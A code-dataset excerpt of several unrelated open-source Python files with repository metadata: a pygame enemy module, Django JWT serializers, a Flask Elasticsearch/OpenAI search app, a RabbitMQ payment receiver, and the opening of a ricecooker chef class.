Water:\r\n print(f\"Pig: broke {type(obj).__name__}\")\r\n obj.death()\r\n else:\r\n print(f\"Pig: died\")\r\n self.death()\r\n\r\n def check(self, dis):\r\n # Проверка расстояния до героя\r\n return (dis >= abs(self.rect.x - Game.H_POS[0]) and\r\n dis >= abs(self.rect.y - Game.H_POS[1]))\r\n\r\n def attack(self):\r\n # Атака\r\n x, y = Game.H_POS\r\n if (abs(self.rect.x - x) < Game.CELL_SIZE and\r\n abs(self.rect.y - y) < Game.CELL_SIZE):\r\n return\r\n\r\n if y > self.rect.y:\r\n self.rect.y += self.speed * 4\r\n if y <= self.rect.y:\r\n self.rect.y -= self.speed * 4\r\n if x > self.rect.x:\r\n self.rect.x += self.speed * 4\r\n if x <= self.rect.x:\r\n self.rect.x -= self.speed * 4\r\n\r\n def fight(self):\r\n # Удар\r\n my.player.removeLifes(Pig.power)\r\n self.wait = 0\r\n\r\n def backMoving(self):\r\n # Возвращение на изначальную позицию\r\n if self.direction == 'U':\r\n self.rect.y += self.speed * 4\r\n if self.direction == 'D':\r\n self.rect.y -= self.speed * 4\r\n if self.direction == 'L':\r\n self.rect.x += self.speed * 4\r\n if self.direction == 'R':\r\n self.rect.x -= self.speed * 4\r\n if not self.check(self.disAttack * 3):\r\n self.wait = Evil.maxWait\r\n\r\n def death(self):\r\n # Смерть\r\n print(f\"Pig: died\")\r\n my.score += 1000\r\n my.evil_group.remove(self)\r\n my.objects.add(self)\r\n self.image = self.imageDied[self.direction]\r\n crEvil()\r\n \r\n\r\nclass Ghost(Evil):\r\n\r\n \"\"\"\r\n Призрак:\r\n - Запускает в героя файрбол\r\n - Проходит сквозь любые препятствия\r\n - Последний призрак, ранивший героя, погибает во время молитвы\r\n \"\"\"\r\n\r\n imageRun = {'R': cut(pg.image.load('data/ghost/right.png')),\r\n 'L': cut(pg.image.load('data/ghost/left.png')),\r\n 'U': cut(pg.image.load('data/ghost/left.png')),\r\n 'D': cut(pg.image.load('data/ghost/left.png')),\r\n }\r\n\r\n imageAttack = {'R': pg.image.load('data/ghost/rightAttack.png'),\r\n 'L': pg.image.load('data/ghost/leftAttack.png'),\r\n 'U': pg.image.load('data/ghost/leftAttack.png'),\r\n 'D': pg.image.load('data/ghost/leftAttack.png'),\r\n }\r\n\r\n imageDied = {'R': pg.image.load('data/ghost/rightDied.png'),\r\n 'L': pg.image.load('data/ghost/leftDied.png'),\r\n 'U': pg.image.load('data/ghost/leftDied.png'),\r\n 'D': pg.image.load('data/ghost/leftDied.png'),\r\n }\r\n\r\n soundRun = pg.mixer.Sound('data/sounds/ghost/run.mp3')\r\n soundRun.set_volume(Evil.volumeRun)\r\n soundFight = pg.mixer.Sound('data/sounds/ghost/fight.mp3')\r\n soundFight.set_volume(Game.SOUND_VOLUME)\r\n soundDamage = pg.mixer.Sound('data/sounds/ghost/damage.mp3')\r\n soundDamage.set_volume(Game.SOUND_VOLUME)\r\n\r\n speed = 0.05 * Game.CELL_SIZE\r\n disRun = 10 * Game.CELL_SIZE\r\n disFight = 6 * Game.CELL_SIZE\r\n maxHealth = 10\r\n\r\n def move(self):\r\n # Действие\r\n if self.died:\r\n if self.firework:\r\n for fire in self.firework:\r\n fire.update(self.firework)\r\n else:\r\n my.evil_group.remove(self) \r\n elif self.check(Ghost.disFight, 0):\r\n self.setImage('fight')\r\n self.fight()\r\n elif self.check(Ghost.disRun, Ghost.disRun):\r\n self.wait = Evil.maxWait\r\n self.setImage('moving')\r\n self.moving()\r\n\r\n def check(self, dis1, dis2):\r\n # Проверка расстояния до героя\r\n x, y = abs(self.rect.x - Game.H_POS[0]), abs(self.rect.y - Game.H_POS[1])\r\n return (dis1 >= x and dis2 >= y or dis1 >= y and dis2 >= x)\r\n\r\n def fight(self):\r\n # Запуск файрбола\r\n if self.wait == Evil.maxWait:\r\n print(f\"Ghost: created FireBall\")\r\n if Game.H_POS[1] > self.rect.y:\r\n direction = 'D'\r\n elif Game.H_POS[1] < self.rect.y:\r\n direction = 'U'\r\n elif Game.H_POS[0] > self.rect.x:\r\n direction = 'R'\r\n elif Game.H_POS[0] < self.rect.x:\r\n direction = 'L'\r\n else:\r\n direction = 'A'\r\n FireBall(self, direction)\r\n self.wait = 0\r\n else:\r\n self.wait += 1\r\n\r\n def death(self):\r\n # Смерть\r\n print(f\"Ghost: died\")\r\n my.score += 1500\r\n if self.died:\r\n return\r\n self.image = self.imageDied[self.direction]\r\n pos = (self.rect.x + Game.CELL_SIZE / 2,\r\n self.rect.y + Game.CELL_SIZE / 2)\r\n self.firework = crFirework(pos)\r\n self.died = True\r\n crEvil()\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n", "repo_name": "MaxGolubev19/Game-about-Ilusha", "sub_path": "Evil.py", "file_name": "Evil.py", "file_ext": "py", "file_size_in_byte": 9587, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.sprite", "line_number": 12, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 14, "usage_type": "attribute"}, {"api_name": "Game.TIME", "line_number": 15, "usage_type": "attribute"}, {"api_name": "My.evil_group", "line_number": 18, "usage_type": "attribute"}, {"api_name": "My.all_sprites", "line_number": 18, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 32, "usage_type": "attribute"}, {"api_name": "My.sound", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Game.TIME", "line_number": 58, "usage_type": "attribute"}, {"api_name": "My.sound_run", "line_number": 59, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 83, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 84, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 85, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 105, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 106, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 109, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 110, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "My.sound", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollideany", "line_number": 131, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 131, "usage_type": "attribute"}, {"api_name": "My.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "Objects.Water", "line_number": 133, "usage_type": "name"}, {"api_name": "Game.H_POS", "line_number": 142, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 143, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 147, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 148, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 149, "usage_type": "attribute"}, {"api_name": "My.player.removeLifes", "line_number": 163, "usage_type": "call"}, {"api_name": "My.player", "line_number": 163, "usage_type": "attribute"}, {"api_name": "My.score", "line_number": 182, "usage_type": "attribute"}, {"api_name": "My.evil_group.remove", "line_number": 183, "usage_type": "call"}, {"api_name": "My.evil_group", "line_number": 183, "usage_type": "attribute"}, {"api_name": "My.objects.add", "line_number": 184, "usage_type": "call"}, {"api_name": "My.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "Help.crEvil", "line_number": 186, "usage_type": "call"}, {"api_name": "Help.cut", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 198, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 199, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 199, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 199, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 200, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 200, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 200, "usage_type": "attribute"}, {"api_name": "Help.cut", "line_number": 201, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 201, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 206, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 206, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 207, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 207, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 210, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 210, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 211, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 211, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 212, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 212, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 213, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 213, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 216, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 218, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 218, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 219, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 220, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 220, "usage_type": "attribute"}, {"api_name": "Game.SOUND_VOLUME", "line_number": 221, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 223, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 224, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 225, "usage_type": "attribute"}, {"api_name": "My.evil_group.remove", "line_number": 235, "usage_type": "call"}, {"api_name": "My.evil_group", "line_number": 235, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 246, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 253, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 255, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 257, "usage_type": "attribute"}, {"api_name": "Game.H_POS", "line_number": 259, "usage_type": "attribute"}, {"api_name": "Bullets.FireBall", "line_number": 263, "usage_type": "call"}, {"api_name": "My.score", "line_number": 271, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "Game.CELL_SIZE", "line_number": 276, "usage_type": "attribute"}, {"api_name": "Help.crFirework", "line_number": 277, "usage_type": "call"}, {"api_name": "Help.crEvil", "line_number": 279, "usage_type": "call"}]} +{"seq_id": "14694325717", "text": "from rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom six import text_type\n\n\nclass APILoginSerializer(TokenObtainPairSerializer):\n\n def validate(self, attrs):\n data = super(TokenObtainPairSerializer, self).validate(attrs)\n\n refresh = self.get_token(self.user)\n\n data['access_token'] = text_type(refresh.access_token)\n data['refresh_token'] = text_type(refresh)\n\n return data\n\n\nclass APIRefreshSerializer(serializers.Serializer):\n\n refresh_token = serializers.CharField(required=True)\n\n def validate(self, attrs):\n\n refresh = RefreshToken(attrs['refresh_token'])\n\n data = {'access_token': text_type(refresh.access_token)}\n\n return data\n", "repo_name": "pythrick/django-template", "sub_path": "app/serializers/authentication.py", "file_name": "authentication.py", "file_ext": "py", "file_size_in_byte": 822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework_simplejwt.serializers.TokenObtainPairSerializer", "line_number": 7, "usage_type": "name"}, {"api_name": "rest_framework_simplejwt.serializers.TokenObtainPairSerializer", "line_number": 10, "usage_type": "argument"}, {"api_name": "six.text_type", "line_number": 14, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 15, "usage_type": "call"}, {"api_name": "rest_framework.serializers.Serializer", "line_number": 20, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CharField", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework_simplejwt.tokens.RefreshToken", "line_number": 26, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "21321215970", "text": "from flask import Flask, render_template, request\nfrom elasticsearch import Elasticsearch\nimport openai\nimport os\nimport queries\n\nELASTIC_CLOUD_ID = os.getenv('ELASTIC_CLOUD_ID')\nELASTIC_USERNAME = os.getenv('ELASTIC_USERNAME')\nELASTIC_PASSWORD = os.getenv('ELASTIC_PASSWORD')\n\nOPENAI_API_KEY = os.getenv('OPENAI_API_KEY')\nES_INDEX = 'my-index'\n\napp = Flask(__name__, template_folder='templates', static_folder='static')\n\n# Configure Elasticsearch\nes = Elasticsearch(cloud_id=ELASTIC_CLOUD_ID, basic_auth=(ELASTIC_USERNAME, ELASTIC_PASSWORD))\n\n# Configure OpenAI\nopenai.api_key = OPENAI_API_KEY\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/search', methods=['POST'])\ndef search():\n # Retrieve the user input from the form\n\n elser = request.form.get('elser')\n bm25 = request.form.get('BM25')\n hybrid = request.form.get('hybrid')\n rrf = request.form.get('rrf')\n\n query = request.form['query']\n elser_boost = 0 if request.form['elser_boost'] == '' else int(request.form['elser_boost'])\n bm25_boost = 0 if request.form['BM25_boost'] == '' else int(request.form['BM25_boost'])\n\n if elser_boost or bm25_boost or hybrid:\n # Hybrid search\n if elser_boost == 0:\n elser_boost = 1\n if bm25_boost == 0:\n bm25_boost = 1\n results_hybrid = queries.hybrid_search(query, elser_boost, bm25_boost, es, ES_INDEX)\n paragraphs_hybrid = [hit['_source']['text'] for hit in results_hybrid['hits']['hits']]\n response_hybrid = queries.generate_text(paragraphs_hybrid, query, openai)\n else:\n results_hybrid = None\n response_hybrid = None\n\n if bm25:\n results_bm25 = queries.search_documents(query, es, ES_INDEX)\n paragraphs = [hit['_source']['text'] for hit in results_bm25['hits']['hits']]\n response_bm25 = queries.generate_text(paragraphs, query, openai)\n else:\n results_bm25 = None\n response_bm25 = None\n\n if elser:\n results_elser = queries.e_search_documents(query, es, ES_INDEX)\n paragraphs_e = [hit['_source']['text'] for hit in results_elser['hits']['hits']]\n response_elser = queries.generate_text(paragraphs_e, query, openai)\n else:\n results_elser = None\n response_elser = None\n\n if rrf:\n results_rff = queries.rrf(query, ES_INDEX)\n paragraphs_rff = [hit['_source']['text'] for hit in results_rff['hits']['hits']]\n response_rff = queries.generate_text(paragraphs_rff, query, openai)\n else:\n results_rff = None\n response_rff = None\n\n return render_template('search.html', query=query, results_hybrid=results_hybrid, response_hybrid=response_hybrid,\n results_bm25=results_bm25,\n response_bm25=response_bm25, results_elser=results_elser, response_elser=response_elser,\n results_rff=results_rff, response_rff=response_rff)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n", "repo_name": "cehaletx/pub", "sub_path": "msmarco4/msmarco.py", "file_name": "msmarco.py", "file_ext": "py", "file_size_in_byte": 3022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 17, "usage_type": "call"}, {"api_name": "openai.api_key", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "queries.hybrid_search", "line_number": 47, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 49, "usage_type": "call"}, {"api_name": "queries.search_documents", "line_number": 55, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 57, "usage_type": "call"}, {"api_name": "queries.e_search_documents", "line_number": 63, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 65, "usage_type": "call"}, {"api_name": "queries.rrf", "line_number": 71, "usage_type": "call"}, {"api_name": "queries.generate_text", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "23974543199", "text": "import pika\nimport os\nimport traceback\nimport threading\nimport json\nimport sys\nfrom types import FunctionType\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nprint(BASE_DIR)\nsys.path.append(BASE_DIR)\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'merchant_api.settings')\nimport django\ndjango.setup()\n\nfrom merchant_api.settings import config\nfrom merchant_api.payments.api import parse_payment_message, parse_transfer_messager\n\n\nclass Receiver(threading.Thread):\n\n def __init__(self, queue):\n super().__init__()\n self.network = queue\n\n def run(self):\n connection = pika.BlockingConnection(pika.ConnectionParameters(\n 'rabbitmq',\n 5672,\n os.getenv('RABBITMQ_DEFAULT_VHOST', 'merchant_api'),\n pika.PlainCredentials(\n os.getenv('RABBITMQ_DEFAULT_USER', 'merchant_api'),\n os.getenv('RABBITMQ_DEFAULT_PASS', 'merchant_api')\n ),\n ))\n\n channel = connection.channel()\n\n queue_name = config.networks.get(self.network).queue\n\n channel.queue_declare(\n queue=queue_name,\n durable=True,\n auto_delete=False,\n exclusive=False\n )\n channel.basic_consume(\n queue=queue_name,\n on_message_callback=self.callback\n )\n\n print(\n 'RECEIVER MAIN: started on {net} with queue `{queue_name}`'\n .format(net=self.network, queue_name=queue_name), flush=True\n )\n\n channel.start_consuming()\n\n def payment(self, message):\n print('PAYMENT MESSAGE RECEIVED', flush=True)\n parse_payment_message(message)\n\n def transferred(self, message):\n print('TRANSFER CONFIRMATION RECEIVED', flush=True)\n parse_transfer_messager(message)\n\n def callback(self, ch, method, properties, body):\n print('received', body, properties, method, flush=True)\n try:\n message = json.loads(body.decode())\n if message.get('status', '') == 'COMMITTED':\n getattr(self, properties.type, self.unknown_handler)(message)\n except Exception as e:\n print('\\n'.join(traceback.format_exception(*sys.exc_info())),\n flush=True)\n else:\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n def unknown_handler(self, message):\n print('unknown message', message, flush=True)\n\n\nnetworks = config.networks.keys()\n\n\nif __name__ == '__main__':\n for network in networks:\n rec = Receiver(network)\n rec.start()\n", "repo_name": "DucatusX/ducatus_merchant_api", "sub_path": "merchant_api/receiver.py", "file_name": "receiver.py", "file_ext": "py", "file_size_in_byte": 2599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.setup", "line_number": 15, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pika.BlockingConnection", "line_number": 28, "usage_type": "call"}, {"api_name": "pika.ConnectionParameters", "line_number": 28, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "pika.PlainCredentials", "line_number": 32, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 33, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 34, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks.get", "line_number": 40, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks", "line_number": 40, "usage_type": "attribute"}, {"api_name": "merchant_api.settings.config", "line_number": 40, "usage_type": "name"}, {"api_name": "merchant_api.payments.api.parse_payment_message", "line_number": 62, "usage_type": "call"}, {"api_name": "merchant_api.payments.api.parse_transfer_messager", "line_number": 66, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "traceback.format_exception", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 75, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks.keys", "line_number": 84, "usage_type": "call"}, {"api_name": "merchant_api.settings.config.networks", "line_number": 84, "usage_type": "attribute"}, {"api_name": "merchant_api.settings.config", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "42265459197", "text": "import argparse\nimport csv\nimport json\nimport logging\nimport os\nimport re\nimport sys\nfrom datetime import datetime\nfrom warnings import warn\n\nimport requests\n\nfrom . import config\nfrom .classes import files\nfrom .classes import nodes\nfrom .commands import uploadchannel_wrapper\nfrom .exceptions import InvalidUsageException\nfrom .exceptions import raise_for_invalid_channel\nfrom .managers.progress import Status\nfrom .utils.downloader import get_archive_filename\nfrom .utils.jsontrees import build_tree_from_json\nfrom .utils.jsontrees import get_channel_node_from_json\nfrom .utils.jsontrees import read_tree_from_json\nfrom .utils.linecook import build_ricecooker_json_tree\nfrom .utils.linecook import FolderExistsAction\nfrom .utils.metadata_provider import CsvMetadataProvider\nfrom .utils.metadata_provider import DEFAULT_CHANNEL_INFO_FILENAME\nfrom .utils.metadata_provider import DEFAULT_CONTENT_INFO_FILENAME\nfrom .utils.metadata_provider import DEFAULT_EXERCISE_QUESTIONS_INFO_FILENAME\nfrom .utils.metadata_provider import DEFAULT_EXERCISES_INFO_FILENAME\nfrom .utils.tokens import get_content_curation_token\nfrom .utils.youtube import YouTubePlaylistUtils\nfrom .utils.youtube import YouTubeVideoUtils\nfrom ricecooker.utils.images import convert_image\n\n\n# SUSHI CHEF BASE CLASS\n################################################################################\n\n\nclass SushiChef(object):\n \"\"\"\n This is the base class that all content integration scripts should subclass.\n Sushi chef scripts call the `main` method as the entry point, which in turn\n calls the `run` method to do the work (see `uploadchannel` in `commands.py`).\n \"\"\"\n\n CHEF_RUN_DATA = config.CHEF_DATA_DEFAULT # loaded from chefdata/chef_data.json\n TREES_DATA_DIR = config.TREES_DATA_DIR # tree archives and JsonTreeChef inputs\n\n channel_node_class = nodes.ChannelNode\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n The SushiChef initialization concerns maintly parsing command line args.\n Overrride this method in your sushi chef class to add custom arguments.\n \"\"\"\n\n # persistent settings for the chef, we check if it exists first in order to\n # support assignment as a class-level variable.\n if not hasattr(self, \"SETTINGS\"):\n self.SETTINGS = {}\n else:\n if \"generate-missing-thumbnails\" in self.SETTINGS:\n warning_text = \"thumbnails setting is deprecated and will be replaced by thumbnails in version 0.8 please update\"\n config.LOGGER.warn(warning_text)\n warn(warning_text, DeprecationWarning)\n self.SETTINGS[\"thumbnails\"] == self.SETTINGS[\n \"generate-missing-thumbnails\"\n ]\n\n if \"compress-videos\" in self.SETTINGS:\n warning_text = \"compress-videos setting is deprecated and will be replaced by compress in version 0.8 please update\"\n config.LOGGER.warn(warning_text)\n warn(warning_text, DeprecationWarning)\n self.SETTINGS[\"compress\"] == self.SETTINGS[\"compress-videos\"]\n\n # these will be assigned to later by the argparse handling.\n self.args = None\n self.options = None\n\n # ARGPARSE SETUP\n # We don't want to add argparse help if subclass has an __init__ method\n subclasses = self.__class__.__mro__[:-2] # all subclasses after this\n if any([\"__init__\" in c.__dict__.keys() for c in subclasses]):\n add_parser_help = False # assume subclass' __init__ will add help\n else:\n add_parser_help = True\n parser = argparse.ArgumentParser(\n description=\"Chef script for uploading content to Kolibri Studio.\",\n add_help=add_parser_help,\n )\n self.arg_parser = parser # save as class attr. for subclasses to extend\n # ARGS\n parser.add_argument(\n \"command\",\n nargs=\"?\",\n default=\"uploadchannel\",\n help=\"Desired action: dryrun or uploadchannel (default).\",\n )\n parser.add_argument(\n \"--token\",\n default=\"#\",\n help=\"Studio API Access Token (specify wither the token value or the path of a file that contains the token).\",\n )\n parser.add_argument(\n \"-u\",\n \"--update\",\n action=\"store_true\",\n help=\"Force file re-download (skip .ricecookerfilecache/).\",\n )\n parser.add_argument(\n \"--debug\", action=\"store_true\", help=\"Print extra debugging infomation.\"\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n default=True,\n help=\"Verbose mode (default).\",\n )\n parser.add_argument(\n \"--warn\", action=\"store_true\", help=\"Print errors and warnings.\"\n )\n parser.add_argument(\"--quiet\", action=\"store_true\", help=\"Print only errors.\")\n parser.add_argument(\n \"--compress\",\n action=\"store_true\",\n help=\"Compress videos using ffmpeg -crf=32 -b:a 32k mono.\",\n )\n parser.add_argument(\n \"--thumbnails\",\n action=\"store_true\",\n help=\"Automatically generate thumbnails for content nodes.\",\n )\n parser.add_argument(\n \"--download-attempts\",\n type=int,\n default=3,\n help=\"Maximum number of times to retry downloading files.\",\n )\n parser.add_argument(\n \"--resume\",\n action=\"store_true\",\n help=\"Resume chef session from a specified step.\",\n )\n allsteps = [step.name.upper() for step in Status]\n parser.add_argument(\n \"--step\",\n choices=allsteps,\n default=\"LAST\",\n help=\"Step to resume progress from (use with the --resume).\",\n )\n parser.add_argument(\n \"--prompt\",\n action=\"store_true\",\n help=\"Prompt user to open the channel after the chef run.\",\n )\n parser.add_argument(\n \"--deploy\",\n dest=\"stage\",\n action=\"store_false\",\n help=\"Immediately deploy changes to channel's main tree. This operation will overwrite the previous channel content. Use only during development.\",\n )\n parser.add_argument(\n \"--publish\",\n action=\"store_true\",\n help=\"Publish newly uploaded version of the 